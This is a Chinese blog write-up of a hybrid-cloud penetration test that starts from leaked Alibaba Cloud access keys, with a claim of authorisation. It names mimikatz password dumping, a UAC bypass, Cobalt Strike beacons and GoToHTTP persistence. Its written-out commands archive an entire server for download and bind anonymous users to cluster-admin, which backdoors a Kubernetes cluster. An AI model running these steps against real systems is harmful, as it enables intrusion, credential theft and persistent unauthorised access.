记一次稍稍完整的/遗憾的混合云渗透

admin 2023年6月27日19:17:47评论46 views字数 1602阅读5分20秒阅读模式
HashRun安全团队-HashMeow-T4x0r

通过key接管,并且创建控制台后门账户

原由:

那必须是有授权的

某大哥通过某处泄露,丢给我了一串ak sk让我进一步利用

ak:LTAIptmCxxxxsk:utma9Sxxxxxxxxxxxxx

记一次稍稍完整的/遗憾的混合云渗透

记一次稍稍完整的/遗憾的混合云渗透

记一次稍稍完整的/遗憾的混合云渗透


接管控制台,ls查看存储桶(OSS)信息:

记一次稍稍完整的/遗憾的混合云渗透


尝试列出所有云实列:

记一次稍稍完整的/遗憾的混合云渗透


查看当前云管理权限:

记一次稍稍完整的/遗憾的混合云渗透


查找云数据库(RDS)

记一次稍稍完整的/遗憾的混合云渗透


尝试云横向,发现均无STS凭据

记一次稍稍完整的/遗憾的混合云渗透

目标需要配置 IAM 角色才行,这个时候会存有sts临时凭据

再次,尝试Linux云横向

记一次稍稍完整的/遗憾的混合云渗透

均无凭据

查看ecs系统权限:

记一次稍稍完整的/遗憾的混合云渗透

上线linux服务器

记一次稍稍完整的/遗憾的混合云渗透

记一次稍稍完整的/遗憾的混合云渗透


admin机器一个nacos,nacos就是存储云凭据的,已经有key了没必要

windows机器不能上线

记一次稍稍完整的/遗憾的混合云渗透


linux反弹shell然后打包整个镜像,在阿里云安全组上打开端口,用python开启简易http服务下载文件

cd / tar cvpzf /mnt/system_backup.tar.gz / --exclude=/mnt/system_backup.tar.gz  --exclude=/proc --exclude=/lost+found --exclude=/mnt --exclude=/sys --exclude=/dev  --exclude=/tmp --exclude=/media

cd /mnt 这里是打包存储地址


云windows上线cs

记一次稍稍完整的/遗憾的混合云渗透

记一次稍稍完整的/遗憾的混合云渗透

记一次稍稍完整的/遗憾的混合云渗透


然后进程迁移下,并且bypass uac进行提权

记一次稍稍完整的/遗憾的混合云渗透

systeminfo发现机器是2008

记一次稍稍完整的/遗憾的混合云渗透

在2012机器一下默认是开启WDigest功能的,所以可以直接抓到铭文密码

运行mimikatz

记一次稍稍完整的/遗憾的混合云渗透


权限维持+解决rdp不能开启

上传gotohttp

记一次稍稍完整的/遗憾的混合云渗透

然后运行他,会在目录下生成gotohttp.ini配置文件

记一次稍稍完整的/遗憾的混合云渗透

把ini文件下载回来发现链接地址:

记一次稍稍完整的/遗憾的混合云渗透

然后链接登录

记一次稍稍完整的/遗憾的混合云渗透

扩大战果(失败)

记一次稍稍完整的/遗憾的混合云渗透

也奇怪用ecs连公司服务器。。。

记一次稍稍完整的/遗憾的混合云渗透

navicat也可以获取,可以自己百度下,不废话了


RDP初探

记一次稍稍完整的/遗憾的混合云渗透

其实很简单,mimi就可以破解,遍历下然后masterkey的值解密就ok


失败

记一次稍稍完整的/遗憾的混合云渗透


私有云渗透

df -T

查看systemd挂载

记一次稍稍完整的/遗憾的混合云渗透


这边列举一些k8s常用的命令:

kubectl -n kube-system describe secret admin-user  //获取token//获取集群api服务地址kubectl cluster-infokubectl cluster-info dump
kubectl get nodes //获取系欸但信息kubectl describe nodes ${容器名} //获取节点详细信息
cat ~/.kube/config //查看kubectl的配置文件
kubectl get pods //查看podskubectl get pods -o wide //查看pod运行主机kubectl describe pods pod名 //查看详细主机信息kubectl exec -it pod名 -- ls -l //在容器中命令执行kubectl exec -it pod名 bash //进入容器kubectl get deployment //查看deploymentkubectl get pods pod名 -o yaml //将已经有的资源导出yaml文件kubectl create -f nginx.yaml //通过yaml创建资源lubectl get namespaces //查看资源对象


创建未授权访问


对6443端口发起攻击,图没截全,忘记截私有云信息手机手机过程了


system:anonymous用户绑定到cluster-admin用户组,从而使6443端口允许匿名用户以管理员权限向集群内部下发指令。

kubectl create clusterrolebinding system:anonymous   --clusterrole=cluster-admin   --user=system:anonymous


记一次稍稍完整的/遗憾的混合云渗透

第二天tmd发现权限掉了


原文始发于微信公众号(T大4的小圈圈):记一次稍稍完整的/遗憾的混合云渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月27日19:17:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次稍稍完整的/遗憾的混合云渗透https://cn-sec.com/archives/1838473.html

发表评论

匿名网友 填写信息